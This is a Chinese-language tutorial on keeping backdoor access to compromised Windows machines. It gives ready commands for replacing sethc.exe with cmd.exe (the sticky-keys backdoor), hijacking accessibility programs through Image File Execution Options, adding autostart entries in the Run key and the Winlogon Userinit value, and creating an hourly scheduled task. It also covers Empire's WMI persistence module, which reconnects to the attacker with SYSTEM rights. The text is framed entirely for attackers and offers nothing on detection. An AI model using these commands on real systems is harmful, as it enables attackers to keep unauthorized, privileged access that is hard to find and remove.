粘滯鍵后門
在windows上連續按5次“Shift”,就可以調出粘滯鍵。
方法一:
如果目標機是 winvista 以上的,即 winvista 以后出的系統,修改 sethc 會提示需要 trustedinstaller 權限,所以想要繼續,那就需要修改所有者為Administrator,并修改其權限:
將C:\Windows\System32目錄下的sethc.exe替換
修改完成后以管理員身份運行執行命令:
cd windows\system32 move sethc.exe sethc.exe.bak copy cmd.exe sethc.exe
然后連續按5次“Shift”,就會彈出cmd框
方法二:
修改注冊表,利用鏡像劫持。鏡像劫持可以理解為當你打開a.exe程序實際打開的卻是b.exe程序,那么a程序就是被b程序劫持了。執行如下命令:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\calc.exe"
在 ‘ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Image File Execution Options ’中添加sethc.exe記錄,在鍵值Debugger中設置我們要替換的程序,即可完成鏡像劫持。
然后連續按5次“Shift”,就會彈出計算器其他同理程序:
C:\Windows\System32\utilman.exe 設置中心 快捷鍵:Windows+U 鍵
C:\Windows\System32\osk.exe 屏幕鍵盤
C:\Windows\System32\Magnify.exe 放大鏡 快捷鍵:Windows+加減號
注冊表自啟動
通過修改注冊表來讓程序自啟動
注冊表位置一:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
執行如下命令添加啟動項:REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\windows\system32\calc.exe"
完成后當開機時自動啟動calc.exe
注冊表位置二:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的鍵值Userinit
將鍵值修改為C:\Windows\system32\userinit.exe,cmd.exe
重新登錄用戶,發現登錄自啟動cmd.exe
計劃任務后門
命令:
schtasks /Create /tn Updater /tr notepad.exe /sc hourly /mo 1
以上的命令會在每小時執行一次notepad.exe,在win7及以下的系統使用at命令代替schtasks
WMI后門
WMI后門有兩個特征:無文件和無進程。相對于以上的方法,它難以排查,而且也比較容易繞過限制
當我們使用empire獲得了一臺主機的控制權后,可以使用empire的wmi模塊留下后門:
在empire使用模塊:usemodule persistence/elevated/wmi
設置好Listener參數:set Listener xxxx
,執行run
重啟靶機,靶機會在五分鐘內重新連接回來,并且連接時就是system權限